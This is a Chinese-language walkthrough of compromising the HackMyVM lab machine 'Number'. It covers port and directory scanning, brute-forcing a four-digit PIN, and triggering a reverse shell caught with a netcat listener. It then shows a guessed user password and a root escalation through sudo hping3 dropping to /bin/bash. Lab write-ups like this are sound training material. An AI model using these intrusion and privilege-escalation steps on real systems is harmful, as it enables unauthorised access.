hack-my-vm-Number

Number

端口探测

1
2
3
4
5
6
7
8
9
10
11
12
kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 172.20.10.5                                                                                   [20:20:00]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 20:20 CST
Nmap scan report for 172.20.10.5
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7F:86:45 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

探测版本及其具体信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
kali@kali [~] ➜  sudo nmap -sT -sV -sC -p22,80 -O 172.20.10.5                                                                                    [20:20:27]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 20:21 CST
Nmap scan report for 172.20.10.5
Host is up (0.00052s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 2f:90:c5:7c:a1:62:89:3a:ec:ea:c3:51:fa:77:f8:3f (RSA)
|   256 8e:21:71:85:04:3d:a7:db:1d:e6:6f:16:27:0c:0d:c9 (ECDSA)
|_  256 e2:39:c7:eb:f2:6d:53:0f:fd:3c:2c:05:31:c9:5b:f2 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:7F:86:45 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.91 seconds

80端口渗透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
kali@kali [~] ➜  curl http://172.20.10.5                                                                                                         [20:21:29]
Good luck.
kali@kali [~] ➜  sudo dirsearch -u http://172.20.10.5/                                                                                           [20:22:13]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_172.20.10.5/__25-03-08_20-22-32.txt

Target: http://172.20.10.5/

[20:22:32] Starting: 
[20:22:39] 301 -  185B  - /admin  ->  http://172.20.10.5/admin/
[20:22:40] 200 -  412B  - /admin/
[20:22:40] 200 -  412B  - /admin/index.php
[20:23:11] 200 -   11B  - /robots.txt

Task Completed

查看robots.txt的内容

1
2
kali@kali [~] ➜  curl http://172.20.10.5/robots.txt                                                                                              [20:23:24]
whoami.php

测试访问woami.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
kali@kali [~] ➜  curl http://172.20.10.5/whoami.php                                                                                              [20:24:06]
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>
kali@kali [~] ➜  curl http://172.20.10.5/admin/whoami.php                                                                                        [20:24:39]
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>

无法访问,从admin目录出发

1

尝试直接爆破

2

失败,尝试转移渗透路线,查看自己有没有漏扫的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://172.20.10.5                      [20:24:47]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.20.10.5
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 185] [--> http://172.20.10.5/admin/]
/pin                  (Status: 301) [Size: 185] [--> http://172.20.10.5/pin/]
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

果然是漏掉了一个目录,我们访问3

看来是4位数字的爆破,和4位数验证码的爆破同理,直接爆破

4

密码4444,直接登录,发现回显也没啥有用的信息,我们尝试访问whoami.php

5

该信息的价值是提供用户名,我们直接返回到admin页面,尝试用这个用户名和4444密码登录

6

我们键入一个ip地址,回显是让我们只能输入数字,所以我们只能ip转数字,网上有在线的工具在线ip转int,ip转数字-BeJSON.com

转换后键入,回显是正在连接反向shell,连接反向shell,最重要的是ip和端口,我们已经键入本机的ip,但不知道其访问的端口,我们使用tcpdump来监听网卡

1
2
3
4
5
6
7
kali@kali [~] ➜  sudo tcpdump -i eth0 src 172.20.10.5                                                                                            [20:48:02]
[sudo] kali 的密码:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
20:48:10.938046 IP 172.20.10.5.35792 > 172.20.10.3.4444: Flags [S], seq 3851990091, win 64240, options [mss 1460,sackOK,TS val 2651486862 ecr 0,nop,wscale 7], length 0
20:48:16.024356 ARP, Request who-has 172.20.10.3 tell 172.20.10.5, length 46
20:48:16.067612 ARP, Reply 172.20.10.5 is-at 08:00:27:7f:86:45 (oui Unknown), length 46

发现目标机器,尝试连接我们的本机的4444端口,我们监听本机4444端口,获取反弹shell

1
2
3
4
5
6
7
8
kali@kali [~] ➜  nc -lvnp 4444                                                                                                                   [20:50:42]
listening on [any] 4444 ...
connect to [172.20.10.3] from (UNKNOWN) [172.20.10.5] 35794
/usr/bin/script -qc /bin/bash /dev/null
www-data@number:~/html/admin$ whoami
whoami
www-data
www-data@number:~/html/admin$

拿到

提权

在手动枚举一些信息之后,并没有发现敏感信息,在跑了linpeas.sh之后,依然一无所获,产生直接切换为melon用户,第一次尝试4444失败,第二次尝试melon成功,用户名即密码

1
2
3
4
5
6
7
8
www-data@number:/home$ su - melon
su - melon
Password: melon

melon@number:~$ whoami
whoami
melon
melon@number:~$

枚举

1
2
3
4
5
6
7
8
9
melon@number:~$ sudo -l
sudo -l
Matching Defaults entries for melon on number:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melon may run the following commands on number:
    (ALL) NOPASSWD: /usr/sbin/hping3
melon@number:~$

查阅资料,hping3可以提权

1
2
3
4
5
6
7
8
melon@number:~$ sudo /usr/sbin/hping3
sudo /usr/sbin/hping3
hping3> /bin/bash
/bin/bash
root@number:/home/melon# whoami
whoami
root
root@number:/home/melon#

完结